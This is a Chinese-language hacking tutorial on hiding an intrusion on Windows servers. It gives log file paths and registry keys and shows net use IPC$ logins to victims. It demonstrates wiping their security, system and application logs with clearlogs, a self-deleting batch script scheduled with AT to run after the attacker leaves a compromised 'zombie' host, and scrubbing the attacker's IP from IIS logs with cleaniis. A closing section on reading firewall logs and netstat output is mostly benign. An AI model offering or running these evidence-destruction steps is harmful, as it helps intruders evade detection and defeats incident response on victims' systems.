清理你入侵後的三個重要痕跡
應用程式日誌
安全日誌
系統日誌
DNS日誌默認位置:%systemroot%system32config,默認文件大小512KB,管理員都會改變這個默認大小。安全日誌文件:%systemroot%system32configSecEvent.EVT
系統日誌文件:%systemroot%system32configSysEvent.EVT
應用程式日誌文件:%systemroot%system32configAppEvent.EVT
FTP日誌默認位置:%systemroot%system32logfilesmsftpsvc1,默認每天一個
WWW日誌默認位置:%systemroot%system32logfilesw3svc1,默認每天一個日誌
以上日誌在註冊表裡的鍵:應用程式日誌,安全日誌,系統日誌,DNS伺服器日誌,
它們這些LOG文件在註冊表中的:
HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog
鑰匙(表示成功)和鎖(表示當用戶在做什麼時被系統停止)。接連四個鎖圖標,表示四次失敗審核,事件類型是帳戶登錄和登錄註銷失敗
怎樣刪除這些日誌:通過上面,得知日誌文件通常有某項服務在後臺保護,除了系統日誌安全日誌應用程式日誌等等,它們的服務是Windos2000的關鍵進程,而且與註冊表文件在一塊,當Windows2000啟動後,啟動服務來保護這些文件,所以很難刪除.
下面就是很難的安全日誌和系統日誌了,守護這些日誌的服務是Event Log,試著停掉它!D:SERVERsystem32LogFilesW3SVC1>net stop eventlog 這項服務無法接受請求的"暫停" 或"停止" 操作。
怎麼清除系統日誌.
怎麼利用工具清除IIS日誌
怎麼清除歷史和cookie
怎麼察看防火牆Blackice的日誌
netstat -an 表示的什麼意思
1.系統日誌 通過手工很難清除. 這裡我們介紹一個工具 clearlog.exe
使用方法:
Usage: clearlogs [\computername] <-app / -sec / -sys>
-app = 應用程式日誌
-sec = 安全日誌
-sys = 系統日誌
a. 可以清除遠程計算機的日誌
** 先用ipc連接上去: net use \ipipc$ 密碼/user:用戶名
** 然後開始清除: 方法
clearlogs \ip -app 這個是清除遠程計算機的應用程式日誌
clearlogs \ip -sec 這個是清除遠程計算機的安全日誌
clearlogs \ip -sys 這個是清除遠程計算機的系統日誌
b.清除本機日誌: 如果和遠程計算機的不能空連接. 那麼就需要把這個工具傳到遠程計算機上面
然後清除. 方法:
clearlogs -app 這個是清除遠程計算機的應用程式日誌
clearlogs -sec 這個是清除遠程計算機的安全日誌
clearlogs -sys 這個是清除遠程計算機的系統日誌
安全日誌已經被清除.Success: The log has been cleared 成功.
為了更安全一點.同樣你也可以建立一個批處理文件.讓自動清除. 做好批處理文件.然後用at命令建立一個計劃任務. 讓自動運行. 之後你就可以離開你的肉雞了.
例如建立一個 c.bat
rem ============================== 開始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 結束
在你的計算機上面測試的時候 可以不要 @echo off 可以顯示出來. 你可以看到結果
第一行表示: 運行時不顯示窗口
第二行表示: 清除應用程式日誌
第三行表示: 清除安全日誌
第四行表示: 清除系統日誌
第五行表示: 刪除 clearlogs.exe 這個工具
第六行表示: 刪除 c.bat 這個批處理文件
第七行表示: 退出
用AT命令. 建立一個計劃任務. 這個命令在原來的教程裡面和雜誌裡面都有. 你可以去看看詳細的使用方法
AT 時間 c:c.bat
之後你就可以安全離開了. 這樣才更安全一點.
2.清除iis日誌:
工具:cleaniis.exe
使用方法:
iisantidote <logfile dir> <ip or string to hide>
iisantidote <logfile dir><ip or string to hide> stop
stop opiton will stop iis before clearing the files and restart it after
<logfile dir> exemple : c:winntsystem32logfilesw3svc1 dont forget the
使用方法解釋:
cleaniis.exe iis日誌存放的路徑 清除參數
什麼意思呢??我來給大家舉個例子吧:
cleaniis c:winntsystem32logfilesw3svc1 192.168.0.1
這個表示清除log中所有此IP(192.168.0.1)地址的訪問記錄. 推薦使用這種方法
cleaniis c:winntsystem32logfilesw3svc1 /shop/admin/
這個表示清除這個目錄裡面的所以的日誌
c:winntsystem32logfilesw3svc1 代表是iis日誌的位置(windows nt/2000) 這個路徑可以改變
c:windowssystem32logfilesw3svc1 代表是iis日誌的位置(windows xp/2003) 這個路徑可以改變
這個測試表示 在日誌裡面沒有這個ip地址.
我們看一下日誌的路徑 再來看一下
我們的ip(192.168.0.1)已經沒有了.
已經全部清空. 同樣這個也可以建立批處理. 方法同上面的那個.
3.清除歷史記錄及運行的日誌:
cleaner.exe
直接運行就可以了.
4.察看blackice的日誌.
這個地方我們可以清除的看到 防火牆的日誌.
這個表示 有人發過來帶有病毒的email附件. ip是: 220.184.153.116
tcp_probe_other 表示 通過tcp 掃描 或者利用別的和你建立連接 通信
這個表示通過埠 80 掃描iis
病毒 nimda
這裡需要很多的計算機協議知識. 同時也需要對英語有了解
才能更好的分析 如果對英語不好 你可以裝一個金山詞霸.
一般情況下 我們可以 對一些可以不用管.
一般這三種情況 不用去管.
最上面的 critical 這個 可以去關注一下 . 一般是確實有別的計算機掃描或者入侵你的計算機
count 代表次數 intruder 是對方的ip event 是通過什麼方式(協議) 掃描或者想入侵的
time表示時間
5.
netstat -an 表示什麼意思?
使用這個命令可以察看到和本機的所有的連接.
Proto Local Address Foreign Address State
協議 本地埠及IP位址 遠程埠及IP位址 狀態
LISTENING 監聽狀態 表示等待對方連接
ESTABLISHED 正在連接著.
TCP 協議是TCP
UDP 協議是UDP
TCP 192.168.0.10:1115 61.186.97.54:80 ESTABLISHED
這個表示 利用tcp協議 本機ip(192.168.0.10)通過埠:1115 和遠程ip(61.186.97.54)埠:80連接
80埠 表示 http 就是你在訪問這個網站.
一般情況下遠程ip的埠: 80 21 8000 這個都是正常的. 如果是別的 就可以看一下你的計算機了。